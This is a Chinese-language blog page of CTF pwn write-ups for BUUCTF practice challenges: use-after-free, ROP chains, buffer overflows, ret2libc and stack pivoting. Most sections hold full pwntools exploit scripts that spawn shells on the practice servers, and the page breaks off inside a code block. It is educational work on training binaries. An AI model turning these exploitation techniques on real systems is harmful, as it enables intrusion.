<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="author" content="Walt CSZ">
    
    
    
    
    
    
    <title>Walt&#39;s Blog</title>
    <link href="http://waltcsz.github.io" rel="prefetch" />

    
<link rel="stylesheet" href="/css/bootstrap.min.css">
<link rel="stylesheet" href="/css/aos.css">
<link rel="stylesheet" href="/css/style.css">

    
<script src="/js/jquery.min.js"></script>

    
<script src="/js/bootstrap.min.js"></script>

    
<script src="/js/aos.js"></script>

    
<script src="/js/highslide/highslide-full.min.js"></script>

    
<link rel="stylesheet" href="/js/highslide/highslide.css">

    <style type="text/css">
        @media (max-width: 768px) {
            body {
                background-color: #f0f0f0;
                background: url('/imgs/xsbg.gif');
                background-attachment: fixed;
            }
        }
    </style>
    
    <!--<script type="text/javascript">
      if (document.images) {
        var avatar = new Image();
        avatar.src = '/imgs/avatar.jpg'
        var previews = 'preview1.jpg,preview2.jpg,preview3.jpg,preview4.jpg'.split(',')
        var previewsPreLoad = []
        for(var i = 0; i < length; i++) {
          previewsPreLoad.push(new Image())
          previewsPreLoad[previewsPreLoad.length - 1].src = '/imgs/preview' + previews[i]
        }
      }
    </script>-->
<meta name="generator" content="Hexo 6.3.0"></head>
<body>
    <!-- 背景轮播图功能 -->
    <section class="hidden-xs">
    <ul class="cb-slideshow">
        <li><span>天若</span></li>
        <li><span>有情</span></li>
        <li><span>天亦老</span></li>
        <li><span>我为</span></li>
        <li><span>长者</span></li>
        <li><span>续一秒</span></li>
    </ul>
</section>
    <!-- 欧尼酱功能, 谁用谁知道 -->
    
    <header class="navbar navbar-inverse" id="gal-header">
    <div class="container">
        <div class="navbar-header">
            <button type="button" class="navbar-toggle collapsed"
                    data-toggle="collapse" data-target=".bs-navbar-collapse"
                    aria-expanded="false">
                <span class="fa fa-lg fa-reorder"></span>
            </button>
            <a href="http://waltcsz.github.io">
                
                <style>
                    #gal-header .navbar-brand {
                        height: 54px;
                        line-height: 24px;
                        font-size: 28px;
                        opacity: 1;
                        background-color: rgba(0,0,0,0);
                        text-shadow: 0 0 5px #fff,0 0 10px #fff,0 0 15px #fff,0 0 20px #228DFF,0 0 35px #228DFF,0 0 40px #228DFF,0 0 50px #228DFF,0 0 75px #228DFF;
                    }
                </style>
                <!-- 这里使用文字(navbar_text or config.title) -->
                <div class="navbar-brand">Walt&#39;s Blog</div>
                
            </a>
        </div>
        <div class="collapse navbar-collapse bs-navbar-collapse">
            <ul class="nav navbar-nav" id="menu-gal">
                
                
                <li class="">
                    <a href="/">
                        <i class="fa fa-home"></i>首页
                    </a>
                </li>
                
                
                
                <li class="">
                    <a href="/archives">
                        <i class="fa fa-archive"></i>归档
                    </a>
                </li>
                
                
                
                
                <li class="dropdown">
                    <!-- TODO 添加hover dropdown效果 -->
                    <a href="#" class="dropdown-toggle" data-toggle="dropdown"
                       aria-haspopup="true" aria-expanded="false" data-hover="dropdown">
                        <i class="fa fa-list"></i>分类
                    </a>
                    <ul class="dropdown-menu">
                        
                        
                        <li>
                            <a href="/categories/writeup/">writeup</a>
                        </li>
                        
                        
                        
                    </ul>
                </li>
                
                
                
                
                
                <li class="">
                    <a href="/tags">
                        <i class="fa fa-tags"></i>标签
                    </a>
                </li>
                
                
                
                
                <li class="">
                    <a href="/about">
                        <i class="fa fa-user"></i>关于我
                    </a>
                </li>
                
                
            </ul>
        </div>
    </div>
</header>
    <div id="gal-body">
        <div class="container">
            <div class="row">
                <div class="col-md-8 gal-right" id="mainstay">
                    
<article class="article well article-body" id="article">
    <div class="breadcrumb">
        <i class="fa fa-home"></i>
        <a href="http://waltcsz.github.io">Walt&#39;s Blog</a>
        >
        <span></span>
    </div>
    <!-- 大型设备详细文章 -->
    <div class="hidden-xs">
        <div class="title-article">
            <h1>
                <a href="/2023/09/11/writeUp/buu_0910/"></a>
            </h1>
        </div>
        <div class="tag-article">
            
            <span class="label label-gal">
                <i class="fa fa-calendar"></i> 2023-09-11
            </span>
            
        </div>
    </div>
    <!-- 小型设备详细文章 -->
    <div class="visible-xs">
        <center>
            <div class="title-article">
                <h4>
                    <a href="/2023/09/11/writeUp/buu_0910/"></a>
                </h4>
            </div>
            <p>
                <i class="fa fa-calendar"></i> 2023-09-11
            </p>
            <p>
                
                
            </p>
        </center>
    </div>
    <div class="content-article">
        <h2 id="bjdctf-2020-router"><a href="#bjdctf-2020-router" class="headerlink" title="bjdctf_2020_router"></a>bjdctf_2020_router</h2><p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/./buu_0910/image-20230911171316327-1698319198503-27.png" alt="image-20230911171316327" data-caption="image-20230911171316327" loading="lazy"></p>
<p>0x7ffd797d1e80 - 0x7ffd797d1fc0 &#x3D; -320</p>
<p>tcache中的地址为与堆基址异或后的地址</p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/365170777">从 VNCTF2021-ff 浅析 libc2.32 下 ptmalloc 新增的防护之指针异或加密 - 知乎 (zhihu.com)</a></p>
<h2 id="zjctf-2019-easyheap"><a href="#zjctf-2019-easyheap" class="headerlink" title="zjctf 2019 easyheap"></a>zjctf 2019 easyheap</h2><h2 id="PicoCTF-2018-buffer-overflow-1"><a href="#PicoCTF-2018-buffer-overflow-1" class="headerlink" title="PicoCTF_2018_buffer_overflow_1"></a>PicoCTF_2018_buffer_overflow_1</h2><p>setegid</p>
<p>送分</p>
<h2 id="black-watch-入群题"><a href="#black-watch-入群题" class="headerlink" title="black watch 入群题"></a>black watch 入群题</h2><h2 id="inndy-rop"><a href="#inndy-rop" class="headerlink" title="inndy_rop"></a>inndy_rop</h2><p>学了个ROPgadget的妙招，–ropchain参数可以自动生成rop链，代码都写好了一半。</p>
<p>其次，找32位elf的系统调用时，用–only ‘int’</p>
<h2 id="hitcontraining-uaf"><a href="#hitcontraining-uaf" class="headerlink" title="hitcontraining_uaf"></a>hitcontraining_uaf</h2><p>Use after free</p>
<p>（与ctfwiki的[例题](<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/use-after-free/">Use After Free - CTF Wiki (ctf-wiki.org)</a>)一致）</p>
<p>这道题经典菜单，add，print，delete三个选项。</p>
<p>在add中，程序会进行两次malloc，第一次malloc一个8字节的空间，存放一个打印函数的地址和第二次malloc的地址，以下称为头块。第二次malloc为实际存放内容的堆块，以下称为真实块。</p>
<p>在print中，利用头块前4字节的打印函数的地址将真实块进行输出。</p>
<p>在delete中，free完没有清空指针，而且add中分配的两个堆块均会被释放。</p>
<p>其次，notelist上限为5，释放堆块后不会清指针，因此只允许分配5次堆块。</p>
<p>存在后门函数magic。</p>
<p>这题没有编辑函数，虽然有指针可以对释放后的堆块进行输出和再次释放，但不能修改。所以我原先的思路，即利用编辑函数修改bk指向头块输出函数地址位置，将堆块分配到其处再修改地址的方案失效。</p>
<p>因此这题利用关键是每次同时分配和释放的两个堆块。倘若某次申请的内存大小为8字节，那么分配的两个堆块大小一样，便会从同一个bin中取出，即0x10的bin。而释放时头块进入的即是0x10的bin。这样我们的真实块必然会分配到已经释放的一个头块上，对其写入magic，调用print对对应的堆块输出，即可跳转到后门函数。</p>
<ul>
<li>申请 note0，真实块 size 为 16（大小与 note 大小所在的 bin 不一样即可）</li>
<li>申请 note1，真实块 size 为 16（同上）</li>
<li>释放 note0</li>
<li>释放 note1</li>
<li>此时，0x20 的 fastbin chunk 中链表为 note1-&gt;note0, 0x10的fastbin chunk中链表为note1_head -&gt; note0_head</li>
<li>申请 note2，并且设置真实块 content 的大小为 8，那么根据堆的分配规则</li>
<li>note2_head 其实会分配note1_head。</li>
<li>note2 对应的 chunk 其实是 note0_head。</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="hljs-number">28447</span>)<br><span class="hljs-comment">#p=process(&#x27;./hacknote&#x27;)</span><br><span class="hljs-comment">#gdb.attach(p, &#x27;b *0x08048A75&#x27;)</span><br><br>target = <span class="hljs-number">0x08048945</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">choose</span>(<span class="hljs-params">x</span>):<br>    p.recvuntil(<span class="hljs-string">b&#x27;Your choice :&#x27;</span>)<br>    p.send(<span class="hljs-built_in">str</span>(x).encode())<br>    <br><span class="hljs-keyword">def</span> <span class="hljs-title function_">mal</span>(<span class="hljs-params">size, content</span>):<br>    choose(<span class="hljs-number">1</span>)<br>    p.sendafter(<span class="hljs-string">b&#x27;Note size :&#x27;</span>, <span class="hljs-built_in">str</span>(size).encode())<br>    p.sendafter(<span class="hljs-string">b&#x27;Content :&#x27;</span>, content)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">free</span>(<span class="hljs-params">index</span>):<br>    choose(<span class="hljs-number">2</span>)<br>    p.recvuntil(<span class="hljs-string">b&#x27;Index :&#x27;</span>)<br>    p.send(<span class="hljs-built_in">str</span>(index).encode())<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">printcont</span>(<span class="hljs-params">index</span>):<br>    choose(<span class="hljs-number">3</span>)<br>    p.recvuntil(<span class="hljs-string">b&#x27;Index :&#x27;</span>)<br>    p.send(<span class="hljs-built_in">str</span>(index).encode())<br><br>mal(<span class="hljs-number">0x10</span>, <span class="hljs-string">&#x27;aa&#x27;</span>)<br>mal(<span class="hljs-number">0x10</span>, <span class="hljs-string">&#x27;aa&#x27;</span>)<br>free(<span class="hljs-number">0</span>)<br>free(<span class="hljs-number">1</span>)<br>mal(<span class="hljs-number">0x8</span>, p32(target))<br>printcont(<span class="hljs-number">0</span>)<br><br>p.interactive()<br></code></pre></td></tr></table></figure>



<h2 id="jarvisoj-test-your-memory"><a href="#jarvisoj-test-your-memory" class="headerlink" title="jarvisoj_test_your_memory"></a>jarvisoj_test_your_memory</h2><h2 id="cmcc-simplerop"><a href="#cmcc-simplerop" class="headerlink" title="cmcc_simplerop"></a>cmcc_simplerop</h2><p>ropchain</p>
<p>这题用ROPgadget秒解，但是需要进行修改，因为只能输入100个字符。</p>
<p>没有遇 ‘\0’ 截断的函数，所以可以把数字输入全部换成pop的形式。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br>r=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="hljs-number">29465</span>)<br><span class="hljs-comment">#r=process(&#x27;./simplerop&#x27;)</span><br><br><br>offset = <span class="hljs-number">3</span><br>p=<span class="hljs-string">b&#x27;a&#x27;</span>*offset<br><br>p += pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0x0806e82a</span>) <span class="hljs-comment"># pop edx ; ret</span><br>p += pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0x080ea060</span>) <span class="hljs-comment"># @ .data</span><br>p += pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0x080bae06</span>) <span class="hljs-comment"># pop eax ; ret</span><br>p += <span class="hljs-string">b&#x27;/bin&#x27;</span><br>p += pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0x0809a15d</span>) <span class="hljs-comment"># mov dword ptr [edx], eax ; ret</span><br>p += pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0x0806e82a</span>) <span class="hljs-comment"># pop edx ; ret</span><br>p += pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0x080ea064</span>) <span class="hljs-comment"># @ .data + 4</span><br>p += pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0x080bae06</span>) <span class="hljs-comment"># pop eax ; ret</span><br>p += <span class="hljs-string">b&#x27;//sh&#x27;</span><br><br>p += pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0x0809a15d</span>) <span class="hljs-comment"># mov dword ptr [edx], eax ; ret</span><br><br>p += pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0x0806e850</span>) <span class="hljs-comment"># pop edx ; pop ecx ; pop ebx ; ret</span><br>p += p32(<span class="hljs-number">0</span>) + p32(<span class="hljs-number">0</span>) + p32(<span class="hljs-number">0x080ea060</span>)<br><br>p += pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0x080bae06</span>) <span class="hljs-comment"># pop eax ; ret</span><br>p += pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0xb</span>) <span class="hljs-comment">#0xb</span><br>p += pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0x080493e1</span>) <span class="hljs-comment"># int 0x80</span><br><br>r.recvuntil(<span class="hljs-string">b&#x27;input :&#x27;</span>)<br>r.send(p)<br>r.interactive()<br></code></pre></td></tr></table></figure>



<h2 id="PicoCTF-2018-buffer-overflow-2"><a href="#PicoCTF-2018-buffer-overflow-2" class="headerlink" title="PicoCTF_2018_buffer_overflow_2"></a>PicoCTF_2018_buffer_overflow_2</h2><p>ret2text</p>
<p>需要注意后门函数两个参数必须为指定值才能输出flag。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="hljs-number">29816</span>)<br><span class="hljs-comment">#p=process(&#x27;./PicoCTF_2018_buffer_overflow_2&#x27;)</span><br><br>target = <span class="hljs-number">0x0080485CB</span><br>main = <span class="hljs-number">0x0804866D</span><br>payload = <span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x06c</span>+<span class="hljs-number">4</span>) + p32(target) + p32(main) + p32(<span class="hljs-number">0x0DEADBEEF</span>) + p32(<span class="hljs-number">0x0DEADC0DE</span>)<br><br>p.recvuntil(<span class="hljs-string">b&#x27;Please enter your string: \n&#x27;</span>)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>



<h2 id="wustctf2020-getshell-2"><a href="#wustctf2020-getshell-2" class="headerlink" title="wustctf2020_getshell_2"></a>wustctf2020_getshell_2</h2><p>ret2text</p>
<p>这题的栈溢出只能溢出一个返回地址加4字节，所以如果按以往的方法只能放一个gadget和其返回地址。但如果用含call的汇编指令，返回地址由程序按正常方式放入，就可以做到放一个gadget和一个参数了。</p>
<p>这题的字符串是一串乱码，但结尾是sh，所以可以直接取sh的地址作system的参数。</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/./buu_0910/image-20230914211535334.png" alt="image-20230914211535334" data-caption="image-20230914211535334" loading="lazy"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="hljs-number">27939</span>)<br><span class="hljs-comment">#p=process(&#x27;./wustctf2020_getshell_2&#x27;)</span><br><span class="hljs-comment">#gdb.attach(p, &#x27;b puts&#x27;)</span><br><br>offset = <span class="hljs-number">0x18</span> +<span class="hljs-number">4</span><br><br>sys = <span class="hljs-number">0x8048529</span><br>sh = <span class="hljs-number">0x08048670</span><br>payload = offset*<span class="hljs-string">b&#x27;a&#x27;</span> + p32(sys) + p32(sh)<br><br>p.recvuntil(<span class="hljs-string">b&#x27;\\_\\ \n&#x27;</span>)<br>p.send(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>ps: 我有个神奇的思路，这道题没有开地址随机化，因此libc地址固定的，所以可以两次启动程序，第一次利用call _puts先泄露基地址然后找到libc中的&#x2F;bin&#x2F;sh字符串的地址，在第二次启动中使用。</p>
<p>但是本地打通了，远程没成功。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> LibcSearcher<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="hljs-number">27939</span>)<br><span class="hljs-comment">#p=process(&#x27;./wustctf2020_getshell_2&#x27;)</span><br><span class="hljs-comment">#gdb.attach(p, &#x27;b puts&#x27;)</span><br>e = ELF(<span class="hljs-string">&#x27;./wustctf2020_getshell_2&#x27;</span>)<br><br>puts_p = e.plt[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>main_a = e.sym[<span class="hljs-string">&#x27;main&#x27;</span>]<br>lsm_g = e.got[<span class="hljs-string">&#x27;__libc_start_main&#x27;</span>]<br><br>puts_call = <span class="hljs-number">0x08048577</span><br>offset = <span class="hljs-number">0x18</span> +<span class="hljs-number">4</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">payload = b&#x27;a&#x27;*offset + p32(puts_call) + p32(lsm_g)</span><br><span class="hljs-string">print(&#x27;length: %x&#x27;%len(payload))</span><br><span class="hljs-string">p.recvuntil(b&#x27;\\_\\ \n\n&#x27;)</span><br><span class="hljs-string">p.sendline(payload)</span><br><span class="hljs-string">lsm_a = u32(p.recv(4))</span><br><span class="hljs-string"></span><br><span class="hljs-string">p.close()</span><br><span class="hljs-string"></span><br><span class="hljs-string">p=remote(&#x27;node4.buuoj.cn&#x27;,27939)</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br>lsm_a = <span class="hljs-number">0xf7df2540</span><br>libc=LibcSearcher(<span class="hljs-string">&#x27;__libc_start_main&#x27;</span>,lsm_a)<br>libcbase = lsm_a - libc.dump(<span class="hljs-string">&#x27;__libc_start_main&#x27;</span>)<br>sys_a = libcbase + libc.dump(<span class="hljs-string">&#x27;system&#x27;</span>)<br>bs_a = libcbase + libc.dump(<span class="hljs-string">&#x27;str_bin_sh&#x27;</span>)<br><br>sys = <span class="hljs-number">0x8048529</span><br><br>payload = offset*<span class="hljs-string">b&#x27;a&#x27;</span> + p32(sys) + p32(bs_a)<br><br>p.recvuntil(<span class="hljs-string">b&#x27;\\_\\ \n&#x27;</span>)<br>p.send(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/./buu_0910/image-20230914214946575.png" alt="image-20230914214946575" data-caption="image-20230914214946575" loading="lazy"></p>
<h2 id="bbys-tu-2016"><a href="#bbys-tu-2016" class="headerlink" title="bbys_tu_2016"></a>bbys_tu_2016</h2><p>ret2text</p>
<p>这垃圾buu系统不知道为啥我不先输入他什么都不显示。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="hljs-number">28253</span>)<br><span class="hljs-comment">#p=process(&#x27;./bbys_tu_2016&#x27;)</span><br><span class="hljs-comment">#gdb.attach(p, &#x27;b puts&#x27;)</span><br><br>target = <span class="hljs-number">0x00804856D</span><br>payload = <span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x0c</span>+<span class="hljs-number">12</span>) + p32(target)<br><br><span class="hljs-comment">#p.recvuntil(&#x27;This program is hungry. You should feed it.&#x27;)</span><br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>



<h2 id="xdctf2015-pwn200"><a href="#xdctf2015-pwn200" class="headerlink" title="xdctf2015_pwn200"></a>xdctf2015_pwn200</h2><p>ret2libc3</p>
<h2 id="mrctf2020-easyoverflow"><a href="#mrctf2020-easyoverflow" class="headerlink" title="mrctf2020_easyoverflow"></a>mrctf2020_easyoverflow</h2><p>考查栈的理解</p>
<p>n0t_r3@11y_f1@g</p>
<p>ju3t_@_f@k3_f1@g</p>
<p>system(“&#x2F;bin&#x2F;sh”);在主函数里，只要通过字符串比较即可执行。利用字符串溢出修改v5的值。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="hljs-number">29368</span>)<br><span class="hljs-comment">#p=process(&#x27;./mrctf2020_easyoverflow&#x27;)</span><br><br>offset = <span class="hljs-number">0x030</span><br>payload = <span class="hljs-string">b&#x27;a&#x27;</span>*offset + <span class="hljs-string">b&#x27;n0t_r3@11y_f1@g&#x27;</span><br><br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>



<h2 id="ciscn-2019-s-4"><a href="#ciscn-2019-s-4" class="headerlink" title="ciscn_2019_s_4"></a>ciscn_2019_s_4</h2><p>ret2libc2 栈迁移</p>
<p>字符串溢出最多到返回地址处，因此将栈迁移到字符串buf起始位置。</p>
<p>在迁移前需要得知栈上地址，第一次read输入0x28字节刚好到达旧ebp位置，获取其地址，计算偏移为-0x38，得到buf的地址。</p>
<p>第二次构造payload时，先空出4字节给ebp，然后接system的plt地址、返回地址以及字符串的地址，之后再接’&#x2F;bin&#x2F;sh\0’字符串。因此字符串地址应该为buf地址加16。之后填充至旧ebp处，用buf地址替换旧ebp，而返回地址填入leave;ret地址。</p>
<p>不知道buu在发什么颠，getshell后就退出控制了，所以选择用cat flag命令。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">#!/usr/bin/python3<br>from pwn import *<br>context(log_level=&#x27;debug&#x27;)<br>#e=ELF(&#x27;./&#x27;)<br>#p=process(&#x27;./ciscn_s_4&#x27;)<br>p=remote(&#x27;node4.buuoj.cn&#x27;,25150)<br>#gdb.attach(p, &#x27;b read&#x27;)<br><br>offset = 0x028<br>payload = b&#x27;a&#x27;*(offset-1) + b&#x27;b&#x27; <br><br>p.sendafter(&#x27;your name?&#x27;,payload)<br>p.recvuntil(b&#x27;ab&#x27;)<br>ebp = u32(p.recv(4))<br>print(&#x27;the ebp is 0x%x&#x27;%ebp)<br><br>buf = ebp - 0x38<br>sys = 0x8048400<br>sys_c = 0x08048559<br>leave_ret = 0x080485FD<br>payload =  p32(ebp)+ p32(sys) + p32(sys_c) + p32(buf+0x10) + b&#x27;cat flag\0&#x27;<br>assert len(payload) &lt;= offset<br>payload = payload.ljust(offset,b&#x27;a&#x27;) + p32(buf) +p32(leave_ret)<br>p.send(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<h2 id="wustctf2020-closed"><a href="#wustctf2020-closed" class="headerlink" title="*wustctf2020_closed"></a>*wustctf2020_closed</h2><p>这题题目给了shell函数，直接执行system(‘&#x2F;bin&#x2F;sh’)但是执行了close(2)和close(1)，关闭了标准输出和错误输出。</p>
<p>解决方法是用bash命令重定向输出到标准输入。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">exec</span> 1&gt;&amp;0<br></code></pre></td></tr></table></figure>

<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/./buu_0910/image-20230915002630116.png" alt="image-20230915002630116" data-caption="image-20230915002630116" loading="lazy"></p>
<h2 id=""><a href="#" class="headerlink" title=""></a></h2><p>泄露cca8处的栈地址，为第2个格式参数。得到ccbf，目标地址cefc，偏移为cefc-ccbf&#x3D;23d。</p>
<p>字符串头取cdcc处，为第 (cdcc-cca0)&#x2F;4&#x3D;4b个格式参数。</p>
<p>修改format末端</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/./buu_0910/image-20230915100049886.png" alt="image-20230915100049886" data-caption="image-20230915100049886" loading="lazy"></p>
<h2 id="-1"><a href="#-1" class="headerlink" title=""></a></h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span 